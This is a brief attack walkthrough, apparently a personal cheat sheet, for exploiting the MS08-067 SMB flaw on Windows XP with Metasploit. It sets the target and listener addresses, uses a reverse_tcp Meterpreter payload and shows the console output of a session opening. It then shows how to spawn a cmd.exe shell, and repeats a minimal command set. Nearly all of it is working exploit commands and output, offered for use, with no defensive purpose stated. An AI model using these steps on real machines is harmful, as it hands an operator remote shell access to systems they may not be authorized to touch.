control – metasploit ms08_067_netapi

One trick pony!

Look for hosts with port 445 (SMB) open.

use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit

[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once done, open a command shell by typing the commands below after the > prompt:

meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...

Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Minimum required config to work:

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set rhost (IP-Address)

msf exploit(ms08_067_netapi) > set lhost (IP-Address)

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on (IP-Address):4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to (IP-Address)
[*] Meterpreter session 1 opened ((IP-Address):4444 -> (IP-Address):1046) at 2010-04-03 16:30:40 +0100

meterpreter > shell
Process 612 created.
Channel 1 created.
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
